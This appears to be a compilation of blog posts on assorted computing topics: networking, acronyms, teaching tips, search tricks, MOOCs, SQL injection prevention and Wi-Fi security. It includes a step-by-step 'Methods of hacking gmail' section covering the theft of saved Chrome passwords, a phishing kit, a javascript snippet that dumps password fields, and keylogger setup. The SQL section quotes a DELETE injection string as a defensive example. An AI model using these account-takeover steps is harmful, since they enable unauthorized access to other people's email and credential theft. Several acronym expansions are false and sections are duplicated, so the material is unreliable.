Promiscuous mode

In computer networking, promiscuous mode or
promisc mode is a mode for a wired network
interface controller (NIC) or wireless network
interface controller (WNIC) that causes the
controller to pass all traffic it receives to the
central processing unit (CPU) rather than
passing only the frames that the controller is
intended to receive. This mode is normally used
for packet sniffing that takes place on a router
or on a computer connected to a hub (instead
of a switch) or one being part of a WLAN.
Interfaces are placed into promiscuous mode by
software bridges often used with hardware
virtualization.
In IEEE 802 networks such as Ethernet, token
ring, and IEEE 802.11, and in FDDI, each frame
includes a destination Media Access Control
address (MAC address). In non-promiscuous
mode, when a NIC receives a frame, it normally
drops it unless the frame is addressed to that
NIC's MAC address or is a broadcast or
multicast frame. In promiscuous mode,
however, the card allows all frames through,
thus allowing the computer to read frames
intended for other machines or network devices.
Many operating systems require superuser
privileges to enable promiscuous mode. A non-
routing node in promiscuous mode can
generally only monitor traffic to and from other
nodes within the same broadcast domain (for
Ethernet and IEEE 802.11) or ring (for token
ring or FDDI). Computers attached to the same
network hub satisfy this requirement, which is
why network switches are used to combat
malicious use of promiscuous mode. A router
may monitor all traffic that it routes.
Promiscuous mode is often used to diagnose
network connectivity issues. There are programs
that make use of this feature to show the user
all the data being transferred over the network.
Some protocols like FTP and Telnet transfer data
and passwords in clear text, without encryption,
and network scanners can see this data.
Therefore, computer users are encouraged to
stay away from insecure protocols like telnet
and use more secure ones such as SSH.

Short forms in the IT world

* AVI = Audio Video Interleave
* RTS = Real Time Streaming
* SIS = Symbian OS Installer File
* AMR = Adaptive Multi-Rate Codec
* JAD = Java Application Descriptor
* JAR = Java Archive
* JAD = Java Application Descriptor
* 3GPP = 3rd Generation Partnership Project
* 3GP = 3rd Generation Project
* MP3 = MPEG player lll
* MP4 = MPEG-4 video file
* AAC = Advanced Audio Coding
* GIF = Graphic Interchangeable Format
* JPEG = Joint Photographic Expert Group
* BMP = Bitmap
* SWF = Shock Wave Flash
* WMV = Windows Media Video
* WMA = Windows Media Audio
* WAV = Waveform Audio
* PNG = Portable Network Graphics
* DOC = Document (Microsoft Corporation)
* PDF = Portable Document Format
* M3G = Mobile 3D Graphics
* M4A = MPEG-4 Audio File
* NTH = Nokia Theme (series 40)
* THM = Themes (SonyEricsson)
* MMF = Synthetic Music Mobile Application
File
* NRT = Nokia Ringtone
* XMF = Extensible Music File
* WBMP = Wireless Bitmap Image
* DVX = DivX Video
* HTML = Hyper Text Markup Language
* WML = Wireless Markup Language *CD -
Compact Disk.
* DVD - Digital Versatile Disk.
* CRT - Cathode Ray Tube.
* DAT - Digital Audio Tape.
*DOS - Disk Operating System.
* GUI - Graphical User Interface.
* HTTP - Hyper Text Transfer Protocol.
* IP - Internet Protocol.
* ISP - Internet Service Provides.
* TCP - Transmission Control Protocol.
* UPS - Uninterruptible Power Supply.
* URL - Uniform Resource Locator.
* USB - Universal Serial Bus.
* VIRUS - Vital Information Resource Under
Seized.
* 3G - 3rd Generation.
* GSM - Global System for Mobile
Communication.
* CDMA - Code Division Multiple Access.
* UMTS - Universal Mobile Telecommunication
System.
* SIM - Subscriber Identity Module.
* HSDPA - High Speed Downlink Packet Access.
* EDGE - Enhanced Data Rate For GSM [ Global
System for Mobile Communication] Evolution.
* VHF - Very High Frequency.
* UHF - Ultra High Frequency.
* GPRS - General Packet Radio Service.
* WAP - Wireless Application Protocol.
* TCP - Transmission Control Protocol .
* ARPANET - Advanced Research Project Agency
Network.
* IBM - International Business Machine
Corporation.
* HP - Hewlett Packard.
* AM/FM - Amplitude/ Frequency Modulation.
* WLAN - Wireless Local Area Network

Ways to share your passion in learning

Most teachers in our recent times realy get hard times in teaching.below are some tips for teachers to their students so that they nurture a good learning culture.
1. Be open with your own passion.
—It’s unbelievably boring to learn from someone who doesn’t even seem to care about what they are saying. It’s incredibly inspiring, on the other hand, to have someone talk about a topic with pure joy. If you love something, then show it. It’s contagious.
2. Regularly apply your passion, and tell your students.
—Be an example. If you were thinking about something, working on a project, or just walking along and found something interest that relates to class, tell you students about the experience. What you and your students talk about doesn’t have to be isolated to your classroom. Let them see how what you’re teaching applies to the world beyond the classroom.
3. Get students to apply it, too.
—Whatever your content is, if students have experience applying that knowledge to more than a test,they’ll be hooked. The world is diverse and fascinating. Classrooms, on the other hand, are abysmally isolating at times. Give them a glimpse of the real world.
4. Passion is cool.
—At least, that what we adults
think. Students often shy away from becoming too “academic” or “nerdy” because school isn’t
always presented as something cool. But it is. Constantly remind students that being smart,
passionate, engaged people is cool–and give them plenty of opportunities to be cool.
5. Set goals and reward improvement.
—When students set a goal for their own academic growth, half the battle is already won. Now
they have an internal motivating factor that will help propel them to that next level of success. And lavishly reward students who
make any improvements.

Turning even just one student onto a particular topic is not easy, and getting an entire class
passionate is a true challenge. But with the right enthusiastic atmosphere, students might
just realize that learning can be really, really
cool.

Google for Teachers Search Tricks

These search tricks can save you time when
researching online for your next project or just
to find out what time it is across the world, so
start using these right away.
1. Convert units. Whether you want to convert
currency, American and metric units, or any
other unit, try typing in the known unit and
the unknown unit to find your answer (like
"how many teaspoons in a tablespoon" or "10
US dollars in Euros").
2. Do a timeline search. Use "view:timeline"
followed by whatever you are researching to
get a timeline for that topic.
3. Get around blocked sites . If you are having
problems getting around a blocked site, just
type "cache:website address" with website
address being the address of the blocked site
to use Google’s cached copy to get where you
are going.
4. Use a tilde . Using a tilde (~) with a search
term will bring you results with related search
terms.
5. Use the image search. Type in your search
word, then select Images to use the image
search when trying to put a picture to your
term.
6. Get a definition. If you want a definition
without having to track down an online (or a
physical) dictionary, just type
"definition:word" to find the definition of the
word in your results (i.e.: "definition:
serendipity" will track down the definition of
the word "serendipity").
7. Search within a specific website . If you
know you want to look up Babe Ruth in
Wikipedia, type in "site:wikipedia.org Babe
Ruth" to go directly to the Wikipedia page
about Babe Ruth. It works for any site, not just
Wikipedia.
8. Search within a specific kind of site . If you
know you only want results from an
educational site, try "site:edu" or for a
government site, try "site:gov" and your search
term to get results only from sites with those
web addresses.
9. Search for a specific file type . If you know
you want a PDF (or maybe an MP3), just type
in "filetype:pdf" and your search term to find
results that are only in that file type.
10. Calculate with Google. Type in any normal
mathematical expressions to get the answer
immediately. For example, "2*4" will get you
the answer "8.
11. Time. Enter "what time is it" and any location
to find out the local time.
12. Find a term in a URL. This handy trick is
especially useful when searching blogs, where
dates are frequently used in the URL. If you
want to know about a topic for that year only
and not any other year, type "inurl:2009" and
your keyword to find results with your
keyword in URLs with 2009 in them.
13. Use Show Options to refine your search.
Click "Show Options" on your search result
page to have access to tools that will help you
filter and refine your results.
14. Search for a face . If you are looking for a
person and not just their name, type
"&imgtype=face" after the search results to
narrow your results to those with images of
faces

Google for teachers

From Google Scholar that returns only results
from scholarly literature to learning more
about computer science, these Google items
will help you at school.
15. Google Scholar. Use this specialized Google
search to get results from scholarly literature
such as peer-reviewed papers, theses, and
academic publishers.
16. Use Google Earth’s Sky feature . Take a look
at the night sky straight from your computer
when you use this feature.
17. Open your browser with iGoogle. Set up an
iGoogle page and make it your homepage to
have ready access to news stories, your Google
calendar, blogs you follow in Google Reader,
and much more.
18. Stay current with Google News . Like an
electronic clearinghouse for news, Google
News brings headlines from news sources
around the world to help you stay current
without much effort.
19. Create a Google Custom Search Engine. On
your own or in collaboration with other
students, put together an awesome project like
one of the examples provided that can be used
by many.
20. Collect research notes with Google
Notebook . Use this simple note-taking tool to
collect your research for a paper or project.
Google Code University . Visit this Google site
to have access to Creative Commons-licensed
content to help you learn more about
computer science.
21. Study the oceans with Google Earth 5 .
Google Earth 5 provides information on the
ocean floor and surface with data from marine
experts, including shipwrecks in 3D.

A Comprehensive List of MOOC (Massive Open Online Courses) Providers

The recent emergence of Massive Open Online Courses , commonly known as MOOCs, is revolutionizing the online education world and
is having a profound impact on higher education. With the growing adoption of MOOCs, the number of MOOC providers has also increased many folds. Below is a
comprehensive and up-to-date list of MOOC providers; might be helpful to all interested.
Peace and cheers.
List of MOOC Providers
1. EdX
–A Not-for-profit enterprise with MIT
and Harvard universities as founding partners.
2. Coursera
–A social entrepreneurship
company founded by computer science professors Andrew Ng and Daphne Koller from Stanford University.
3. NovoEd
– Rebranded version of Stanford’s
Venture Lab, with a special focus on
students collaboration and real-world course projects.
4. Udacity
– Udacity was an outgrowth of a
Stanford University experiment in which Sebastian Thrun and Peter Norvig offered their ‘Introduction to Artificial Intelligence’
course online for free in which over
160,000 students in more than 190
countries enrolled.
5. Futurelearn
- The first UK-led multi-institutional platform, partnering with 17
UK universities, offering MOOC to students around the world. It is a private company owned by the Open University.
6. OpenUpEd
- First Pan-European MOOC
initiative, with support of the European commission. It includes partners from 11
countries.
7. iversity
– A company with a diverse
interdisciplinary team from Berlin presently offering MOOC production fellowship and
collaboration network for academia.
8. Open2Study
– An initiative of Open
Universities Australia which itself is a leading provider online education through collaboration of several Australian universities.
9. Canvas
– An open, online course network
that connects students, teachers &
institutions
10. 10gen Education
- an online learning
platform run by 10gen (the MongoDB company)
11. OpenLearning
12. Class2Go – UWA
13. Class2Go
– Stanford Now in maintenance
mode. Will be merged with edX platform.
14. MRUniversity
– Focusing on economics
courses, founded by two GMU professors
15. Academic Earth
16. P2PU -
Peer to Peer University is a non-
profit online community based learning platform, founded with funding from the
Hewlett Foundation and the Shuttleworth Foundation.
17. Udemy
– An online learning platform that
allows anyone to host their video courses.
18. Caltech’s ‘Learning From Data’ Course
19. OpenHPI
- The educational Internet platform
of the German Hasso Plattner Institute, Potsdam, focusing on courses in Information and Communications Technology (ICT).
20. UoPeople
– University of the People
(UoPeople) is a tution-free, non-profit,online academic institution offering undergraduate programs in Business Administration and Computer Science.
21. Saylor
- a non-profit organization that
provides over 280 free, self-paced courses.
22. World Education University – WEU
23. CourseSites MOOCs
24. Open Learning Initiative – CMU
25. Unimooc
26. iDESWEB
27. WideWorldEd
– First Canadian MOOC provider
28. Eliademy
29. MOOC on
30. Alison
31. Khan Academy
- Finally, it’s included in the
list!
32. Schoo
– Japan’s MOOC provider. Presently,
offering more than 130 courses
33. Veduca – From Brazil
34. Acamica
35. Poynter’s News University
36. @ral
38. Aquent
39. Kennesaw State University’s
MOOC Kennesaw State University will offer “K-12 Blended and Online Learning MOOC “, its first, beginning January 2014
40. Pedagogy First Offers program for onlineteaching certificate
41. Think CERCA Chicago based company helps develop critical thinking and writing skills for a
better K-12 education
42. Modern Lessons Helps teachers to become
tech savvy and more engaged
43. Santa Fe Institute
Santa Fe Institute is
offering a series of MOOCs covering the field of complex systems science ranging from
beginner to expert levels, courtesy Complexity Explorer Project.

Massive Open Online Learning (moocs)

The moocs are now taking over our education system.students around the world have now moved to easier mode of learning where flexibility and content is just out of this world.
Some of the courses available in moocs come from the best universities in the world such as MIT,Harvard,Stanford etc.
Some the classes available in moocs are:
-Edx
-Futurelearn
-Iversity
-Class central
-udemy
-Khan academy
-Canvas.net n many more

Take this opportunity and learn a course your dream and earn certificates.classes have flexibility and some courses are self-paced

INTERNET ERROR CODES !!

Error 400 - Bad request.
Error 401 - unauthorized
request.
Error 403 - forbidden.
Error 404 - Not found.
Error 500 -Internal error.
Error 501 - Not Implemented
Error 502 - Bad Gateway
Error 503 -Service unavailable.
Error 504 - Gateway Time-Out
Error 505 - HTTP Version not
supported/DNS Lookup Fail/
unknw host
Error 500-599 - Server errorsNTERNET ERROR
CODES !!
Error 400 - Bad request.
Error 401 - unauthorized
request.
Error 403 - forbidden.
Error 404 - Not found.
Error 500 -Internal error.
Error 501 - Not Implemented
Error 502 - Bad Gateway
Error 503 -Service unavailable.
Error 504 - Gateway Time-Out
Error 505 - HTTP Version not
supported/DNS Lookup Fail/
unknw host
Error 500-599 - Server error

How to prevent SQL injections

Use prepared statements and parameterized
queries. These are SQL statements that are sent
to and parsed by the database server separately
from any parameters. This way it is impossible
for an attacker to inject malicious SQL.
You basically have two options to achieve this:
Using PDO:
$stmt = $pdo->prepare('SELECT * FROM
employees WHERE name = :name');
$stmt->execute(array('name' => $name));
foreach ($stmt as $row) {
// do something with $row
}
Using MySQLi:
$stmt = $dbConnection->prepare('SELECT *
FROM employees WHERE name = ?');
$stmt->bind_param('s', $name);
$stmt->execute();
$result = $stmt->get_result();
while ($row = $result->fetch_assoc()) {
// do something with $row
}
PDO
Note that when using PDO to access a MySQL
database real prepared statements are not used
by default. To fix this you have to disable the
emulation of prepared statements. An example
of creating a connection using PDO is:
$dbConnection = new PDO('mysql:dbna
me=dbtest;host=127.0.0.1;charset=utf8', 'user',
'pass');
$dbConnection->setAttribute(PD
O::ATTR_EMULATE_PREPARES, false);
$dbConnection->setAttribute(PD
O::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
In the above example the error mode isn't
strictly necessary, but it is advised to add it.
This way the script will not stop with a Fatal
Error when something goes wrong. And it gives
the developer the chance to catch any error(s)
which are thrown as PDOExceptions.
What is mandatory however is the first
setAttribute() line, which tells PDO to disable
emulated prepared statements and use real
prepared statements. This makes sure the
statement and the values aren't parsed by PHP
before sending it to the MySQL server (giving a
possible attacker no chance to inject malicious
SQL).
Although you can set the charset in the options
of the constructor, it's important to note that
'older' versions of PHP (< 5.3.6) silently ignored
the charset parameter in the DSN.
Explanation
What happens is that the SQL statement you
pass to prepare is parsed and compiled by the
database server. By specifying parameters
(either a ? or a named parameter like :name in
the example above) you tell the database engine
where you want to filter on. Then when you call
execute, the prepared statement is combined
with the parameter values you specify.
The important thing here is that the parameter
values are combined with the compiled
statement, not an SQL string. SQL injection
works by tricking the script into including
malicious strings when it creates SQL to send to
the database. So by sending the actual SQL
separately from the parameters, you limit the
risk of ending up with something you didn't
intend. Any parameters you send when using a
prepared statement will just be treated as
strings (although the database engine may do
some optimization so parameters may end up as
numbers too, of course). In the example above,
if the $name variable contains 'Sarah'; DELETE
FROM employees the result would simply be a
search for the string "'Sarah'; DELETE FROM
employees", and you will not end up with an
empty table.
Another benefit with using prepared statements
is that if you execute the same statement many
times in the same session it will only be parsed
and compiled once, giving you some speed
gains.
Oh, and since you asked about how to do it for
an insert, here's an example (using PDO):
$preparedStatement = $db->prepare('INSERT
INTO table (column) VALUES (:column)');
$preparedStatement->execute(array('column' =>
$unsafeValue));
127.0.0.1
127.0.0.1

Trusting VPN providers

When chooising VPN the one thing u need to
know is that u can trust your VPN provider and
that they Dont keep logs of your data we at
cyberlovesecurity have booked a meeting with
an VPN provider to talk about security i. I will
give u all an example : some VPN providers have
keeped logs of their users data and a big VPN
provider ( https://www.hidemyass.com )
They keept data on a lulzsec member and gave
that data to the cops long story short this
person is in jail now. So u need to pick one
good thats why we are setting up this meeting
to talk about cheap and secure VPN with a
company and se IF we can get something going

4 Secrets Wireless Hackers Don't Want You to Know!

You're using a wireless access point that has
encryption so you're safe, right? Wrong!
Hackers want you to believe that you are
protected so you will remain vulnerable to
their attacks. Here are 4 things that wireless
hackers hope you won't find out, otherwise
they might not be able to break into your
network and/or COMPUTER:
1. WEP encryption is useless for protecting
your wireless network. WEP is easily cracked
within minutes and only provides users with
a false sense of security.
Even a mediocre hacker can defeat Wired
Equivalent Privacy (WEP)-based security in a
matter of minutes, making it essentially
useless as a protection mechanism. Many
people set their wireless routers up years ago
and have never bothered to change their
wireless encryption from WEP to the newer
and stronger WPA2 security. Updating your
router to WPA2 is a fairly simple process.
Visit your wireless router MANUFACTURER'S
website for instructions.
2. Using your wireless router's MAC filter to
prevent unauthorized devices from joining
your network is ineffective and easily
defeated.
Every piece of IP-based hardware, whether
it's a computer, game system, PRINTER, etc,
has a unique hard-coded MAC address in its
network interface. Many routers will allow
you to permit or deny network access based
on a device's MAC address. The wireless
router inspects the MAC address of the
network device requesting access and
compares it your list of permitted or denied
MACs. This sounds like a great security
mechanism but the problem is that hackers
can "spoof" or forge a fake MAC address that
matches an approved one. All they need to
do is use a wireless packet capture
PROGRAM to sniff (eavesdrop) on the
wireless traffic and see which MAC addresses
are traversing the network. They can then set
their MAC address to match one of that is
allowed and join the network.
3. Disabling your wireless router's remote
ADMINISTRATIONfeature can be a very
effective measure to prevent a hacker from
taking over your wireless network.
Many wireless routers have a setting that
allows you to administer the router via a
wireless connection. This means that you can
access all of the routers security settings and
other features without having to be on a
COMPUTER that is plugged into the router
using an Ethernet CABLE. While this is
convenient for being able to administer the
router remotely, it also provides another
point of entry for the hacker to get to your
security settings and change them to
something a little more hacker friendly.
Many people never change the factory
default admin passwords to their wireless
router which makes things even easier for
the hacker. I recommend turning the "allow
admin via wireless" feature off so only
someone with a physical connection to the
network can attempt to administer the
wireless router settings.
4. If you use public hotspots you are an easy
target for man-in-the-middle and session
hijacking attacks.
Hackers can use tools like Firesheep and
AirJack to perform "man-in-the-middle"
attacks where they insert themselves into the
wireless conversation between sender and
receiver. Once they have successfully
inserted themselves into the line of
communications, they can harvest your
ACCOUNT passwords, read your e-mail, view
your IMs, etc. They can even use tools such
as SSL Strip to obtain passwords for secure
websites that you visit. I recommend using a
commercial VPN service provider to protect
all of your traffic when you are using wi-fi
networks. Costs range from $7 and up per
month. A secure VPN provides an additional
layer of security that is extremely difficult to
defeat. Unless the hacker is extremely
determined they will most likely move on and
try an easier targe

Methods of hacking gmail-

1.Using Chrome
Note: The user you're looking to hack must
have set up Google Chrome to automatically
log in to a Gmail account.
Step 1 Open Google Chrome
Step 2 Type “chrome://settings/" into the URL address bar > Choose “Show Advanced Settings.”
Step 3 Choose “Manage Saved Passwords”under “Passwords and Forms”: Chrome will load the accounts on which the user has
saved passwords.
Step 4 Click on “Show” next to the blocked out password to view the password.
2.Using Phishing
Step 1 Find a computer which is not your primary computer that you're looking to hack.
Step 2 Download the Gmail Phishing program.
Step 3 Sign up for a free web hosting program, using a fake email account.
Step 4 Upload the gmail, log and mail files(present in the Gmail Phishing program rar file) to your web hosting account.
Step 5 Create an HTML email that mimics the messages sent to Gmail users that redirects them to a fake website to share their data.
Step 6 Attach the 3 hosted files in your email and/or web page that mimics Gmail.
Step 7 Wait for the user to click on the link and sign in using your website.
Step 8 Open the log.txt file. It should include the username and password for the email account.
3.Using Password Reminder Script
Step 1 Go to the computer of the person whose Gmail account you want to hack.
Step 2 Go to the Gmail login page.
Step 3 Type the following script into the address bar:
“javascript:(function(){var%20s,F,j,f,i;%20s%
20=%20%22%22;%20F%20=%20document.forms;%20for(j=0;%20j%20{%20f%20=
%20F[j];%20for%20(i=0;%20i{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)%20s%20+
=%20f[i].value%20+%20%22n%22;%20}%20}%20if%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:nn%22%20+%20s);
%20else%20alert(%22There%20are%20no%20passwords%20in%20forms%20on%20this%20page.%22);})();.”
Step 4 Press Enter.
4.Using Keylogging
Step 1 Go to the computer of the person whose Gmail account you want to hack.
Step 2 Download a keylogging software program.
Step 3 Set up the keylogging software so that it will email you when the computer has used
Gmail.
Step 4 Access the resulting stored logs once you receive the email.

Dradis

Dradis is a tool to help in the process of penetration testing. Penetration testing is about information:
Information discovery
Exploit useful information
Report the findings But penetration testing is also about sharing the information you and your teammates gather. Not sharing the information available
in an effective way will result in exploitation oportunities lost and the overlapping of efforts.
http://dradisframework.org

How to find out if the login site u just received is real or just a phishing site

step one look at the URL does it seem legit?
Step two look at the source code ,if the password u type in is set to get instead of post u might be worried
step three look the URL/
domain up on a website or use nslookup this is a great way if u get a link from an unknown source telling u to login somewhere

20 Hacking Forums !!!

1. Hack This Site!
-Provides realistic challenges which allow
you to practice your cracking skills in a safe,
legal environment.
2. Hack-tech
-Cover hacking, infosec and network security.
-Topics like firewalls, encryption and
malicious software are also available.
3. Hack Hound
-Learn about programming, malware
analysis, windows security and server
security.
4. Binary Revolution Forums
-Offers gallery, blog, download on hacking
resources.
find
-Learn about exploits, Shellcode,
vulnerability reports, 0days, remote exploits,
local exploits, security articles, tutorials and
more.
6. Blackhat Forums - Underground Hacking
and Security Community
-Claims to be the best IT Security/Hacking
community on the Internet.
7. InterN0T - Underground Security Training
-Free Community on hacking, exploiting,
security, pentesting, programming Languages
etc.
8. Crackmes.de
-Claims to be the most complete Crackmes
web page on the internet.
9. h4cky0u.org
-Cover every possible aspect of hacking and
network, information security.
10. Darknet
-Learn about eEthical hacking, penetration
testing and computer security.
11. CrackingForum
-Latest cracking programs and crack tutorials
are available here.
12. r00tsecurity
-Topics like hacking, infosec and network
security are discussed in detail.
-A huge collection of tutorials, articles,
books, guides and tools make it a worthy try.
13. The Ethical Hacker Network
-Free online magazine for the security
professional.
14. CyberTerrorists
-Discussions on latest exploits, scripts, latest
softwares, music , movies , and other
neccesary things.
15. LeetCoders
-Organisation of programmers and IT
enthusiasts who want to learn programming.
16. rohitab.com
-Programming, security, reverse enginnering,
viruses, web development etc are discussed.
17. DragonSoft Vulnerability DataBase
-It's one of the top global information
security expert organisations.
18. AV Hackers
-Rapidly growing hacking forum.
19. PAK Bugs
-Learn about bugs, security, scripts, shells,
shell codes, hackers, programming, graphics,
msn hacking, hacking software,warez,hacking
tools,yahoo! hacking and more.
20. Uber Forums
-Download hacking tools, cracks and
exploits.

Becoming a software developer,

Becoming a software developer, also known as
a computer programmer, you'll be playing a
key role in the design, installation, testing and
maintenance of software systems. The
programs you create are likely to help
businesses be more efficient and provide a
better service.
Based on your company’s particular
requirements, you might be responsible for
writing and coding individual programmes or
providing an entirely new software resource.
The specifications you’ll work on will often
come from IT analysts.
Software developers are employed across
virtually all industry sectors, from finance and
retail to engineering, transport and public
organisations, so the projects you work on can
be highly varied.
Sometimes you may also use ‘off the shelf’
software. Requiring you to modify and
integrate this into an existing network to meet
the needs of the business.
As a software developer, your list of tasks can
include:
• Reviewing current systems
• Presenting ideas for system improvements,
including cost proposals
• Working closely with analysts, designers and
staff
• Producing detailed specifications and writing
the program codes
• Testing the product in controlled, real
situations before going live
• Preparation of training manuals for users
• Maintaining the systems once they are up
and running
Opportunities
Currently, about a third of IT jobs are in
development and programming and you can
become a software developer across virtually
all industry sectors. So if you have a particular
area of interest, there's a chance you can work
in a suitable industry.
In a typical progression path, you could be
promoted to senior or principal developer and
from there to project manager. Alternatively,
you could chose to move into a related field of
technology, like systems design, IT architecture
and business systems analysis.
If you’re keen to work for yourself, there is a
chance you could work as a freelancer or
consultant, giving you increased working
flexibility. Overseas work is also available for
those interested in seeing more of the world
and working in a range of locations.
Required skills
Knowledge of programming skills is a
prerequisite. However, the particular language
will depend on the requirements of the specific
company. Becoming a software developer, also known as
a computer programmer, you'll be playing a
key role in the design, installation, testing and
maintenance of software systems. The
programs you create are likely to help
businesses be more efficient and provide a
better service.
Based on your company’s particular
requirements, you might be responsible for
writing and coding individual programmes or
providing an entirely new software resource.
The specifications you’ll work on will often
come from IT analysts.
Software developers are employed across
virtually all industry sectors, from finance and
retail to engineering, transport and public
organisations, so the projects you work on can
be highly varied.
Sometimes you may also use ‘off the shelf’
software. Requiring you to modify and
integrate this into an existing network to meet
the needs of the business.
As a software developer, your list of tasks can
include:
• Reviewing current systems
• Presenting ideas for system improvements,
including cost proposals
• Working closely with analysts, designers and
staff
• Producing detailed specifications and writing
the program codes
• Testing the product in controlled, real
situations before going live
• Preparation of training manuals for users
• Maintaining the systems once they are up
and running
Opportunities
Currently, about a third of IT jobs are in
development and programming and you can
become a software developer across virtually
all industry sectors. So if you have a particular
area of interest, there's a chance you can work
in a suitable industry.
In a typical progression path, you could be
promoted to senior or principal developer and
from there to project manager. Alternatively,
you could chose to move into a related field of
technology, like systems design, IT architecture
and business systems analysis.
If you’re keen to work for yourself, there is a
chance you could work as a freelancer or
consultant, giving you increased working
flexibility. Overseas work is also available for
those interested in seeing more of the world
and working in a range of locations.
Required skills
Knowledge of programming skills is a
prerequisite. However, the particular language
will depend on the requirements of the specific
company. Among the skills employers will look
for are:
Knowledge of programming skills are a given if
you want to get into software development.
You'll need to be comfortable with web-based
programs, as well as traditional programs like
Java and Visual Basic.
The key skills to play up when you're looking
for a job as a software developer are as
follows:
• Expertise in current computer hardware and
software
• Ability to use one or more development
language (C++, PHP, HTML, etc.)
• Strong communication skills
• Ability to work in a team
• Eye for detail and identifying problems
• An understanding of business
• Analytical and commercial experience
Entry requirements
Most employers will expect you have to have a
relevant computing qualification or degree,
however there are companies that run trainee
programmes for those with AS levels.
If you have a degree, but it’s not related to IT,
you could apply for a graduate trainee scheme,
or take a postgraduate conversion course to
build up the relevant skills.
Some of the most sought after skills by
employers include Java, C++, Smalltalk, Visual
Basic, Oracle, Linux and .NET. PHP are also
becoming increasingly in demand.
Training
It’s essential that you stay up to date with the
fast paced IT industry as new developments are
always appearing. Many organisations may
offer a training programme to keep you
updates on the latest movements within the
industry, particularly relating to the business’
requirements and resources.
At a junior level, you could learn many skills
from more senior programmers and/or go on
external courses to boost your personal skills.
Much of this training will be focused on
programming, systems analysis and software
from recognised providers including the
British Computer Society, e-skills, the Institute
of Analysts and Programmers and the Institute
for the Management of Information Systems.
All the software vendors, including Microsoft
and Sun run accredited training too.
Hours and environment
In most cases you’ll be working 37 to 40 hours
a week, but when deadlines have to be met,
you can be required to working longer and
later hours or at weekend.
Traveling may be involved, depending whether
you work in house or for a range of clients. If
you do work for clients, it’s likely you’ll have
to visit their sites and spend the majority of
your time on their premises. If they're far
away, it may be necessary to work away from
home for a period of time. Thanks to various
technological advances, there’s also the
possibility of working remotely from home if
you’re self-employed or your company allows
it.
Average salary
As a graduate you'll probably start earning
around £20,830 to £25,770. At management
level, your pay is likely to increase to £26,000
to £70,000, or even higher with bonuses.
Many of the roles are positioned in London
and tend to offer higher salaries.
Knowledge of programming skills are a given if
you want to get into software development.
You'll need to be comfortable with web-based
programs, as well as traditional programs like
Java and Visual Basic.
The key skills to play up when you're looking
for a job as a software developer are as
follows:
• Expertise in current computer hardware and
software
• Ability to use one or more development
language (C++, PHP, HTML, etc.)
• Strong communication skills
• Ability to work in a team
• Eye for detail and identifying problems
• An understanding of business
• Analytical and commercial experience
Entry requirements
Most employers will expect you have to have a
relevant computing qualification or degree,
however there are companies that run trainee
programmes for those with AS levels.
If you have a degree, but it’s not related to IT,
you could apply for a graduate trainee scheme,
or take a postgraduate conversion course to
build up the relevant skills.
Some of the most sought after skills by
employers include Java, C++, Smalltalk, Visual
Basic, Oracle, Linux and .NET. PHP are also
becoming increasingly in demand.
Training
It’s essential that you stay up to date with the
fast paced IT industry as new developments are
always appearing. Many organisations may
offer a training programme to keep you
updates on the latest movements within the
industry, particularly relating to the business’
requirements and resources.
At a junior level, you could learn many skills
from more senior programmers and/or go on
external courses to boost your personal skills.
Much of this training will be focused on
programming, systems analysis and software
from recognised providers including the
British Computer Society, e-skills, the Institute
of Analysts and Programmers and the Institute
for the Management of Information Systems.
All the software vendors, including Microsoft
and Sun run accredited training too.
Hours and environment
In most cases you’ll be working 37 to 40 hours
a week, but when deadlines have to be met,
you can be required to working longer and
later hours or at weekend.
Traveling may be involved, depending whether
you work in house or for a range of clients. If
you do work for clients, it’s likely you’ll have
to visit their sites and spend the majority of
your time on their premises. If they're far
away, it may be necessary to work away from
home for a period of time. Thanks to various
technological advances, there’s also the
possibility of working remotely from home if
you’re self-employed or your company allows
it.
Average salary
As a graduate you'll probably start earning
around £20,830 to £25,770. At management
level, your pay is likely to increase to £26,000
to £70,000, or even higher with bonuses.
Many of the roles are positioned in London
and tend to offer higher salaries.

Web Application Penetration Testing Tool 2

OWASP Zed Attack Proxy Project
The Zed Attack Proxy (ZAP) is an easy to use
integrated penetration testing tool for
finding vulnerabilities in web applications.
It is designed to be used by people with a
wide range of security experience and as
such is ideal for developers and functional
testers who are new to penetration testing.
ZAP provides automated scanners as well as a
set of tools that allow you to find security
vulnerabilities manually

Some of ZAP’s features:
Intercepting Proxy
Automated scanner
Passive scanner
Brute Force scanner
Spider
Fuzzer
Port scanner
Dynamic SSL certificates
API
Beanshell integration
Some of ZAP’s characteristics:
Easy to install (just requires java 1.6)
Ease of use a priority
Comprehensive help pages
Fully internationalized
Under active development
Open source
Free (no paid for ‘Pro’ version)
Cross platform
Involvement actively encouraged

Web Application Penetration Testing Tool 1

Arachni
Arachni is a feature-full, modular, high-
performance Ruby framework aimed towards
helping penetration testers and
administrators evaluate the security of web
applications.
Arachni is smart, it trains itself by learning
from the HTTP responses it receives during
the audit process.
Unlike other scanners, Arachni takes into
account the dynamic nature of web
applications and can detect changes caused
while travelling
through the paths of a web application’s
cyclomatic complexity.
This way attack/input vectors that would
otherwise be undetectable by non-humans
are seamlessly handled by Arachni.
Finally, Arachni yields great performance due
to its asynchronous HTTP model (courtesy of
Typhoeus).
Thus, you’ll only be limited by the
responsiveness of the server under audit and
your available bandwidth.
Note: Despite the fact that Arachni is mostly
targeted towards web application security, it
can easily be used for general purpose
scraping, data-mining, etc with the addition
of custom modules.
Sounds cool, right?
Features:
Helper audit methods:
For forms, links and cookies auditing.
A wide range of injection strings/input
combinations.
Writing RFI, SQL injection, XSS etc modules
is a matter of minutes if not seconds.
Currently available modules:
Audit:
SQL injection
Blind SQL injection using rDiff analysis
Blind SQL injection using timing attacks
CSRF detection
Code injection (PHP, Ruby, Python, JSP,
ASP.NET)
Blind code injection using timing attacks
(PHP, Ruby, Python, JSP, ASP.NET)
LDAP injection
Path traversal
Response splitting
OS command injection (*nix, Windows)
Blind OS command injection using timing
attacks (*nix, Windows)
Remote file inclusion
Unvalidated redirects
XPath injection
Path XSS
URI XSS
XSS
XSS in event attributes of HTML elements
XSS in HTML tags
XSS in HTML ‘script’ tags
Recon:
Allowed HTTP methods
Back-up files
Common directories
Common files
HTTP PUT
Insufficient Transport Layer Protection for
password forms
WebDAV detection
HTTP TRACE detection
Credit Card number disclosure
CVS/SVN user disclosure
Private IP address disclosure
Common backdoors
.htaccess LIMIT misconfiguration
Interesting responses
HTML object grepper
E-mail address disclosure
US Social Security Number disclosure
Forceful directory listing
http://www.arachni-scanner.com/

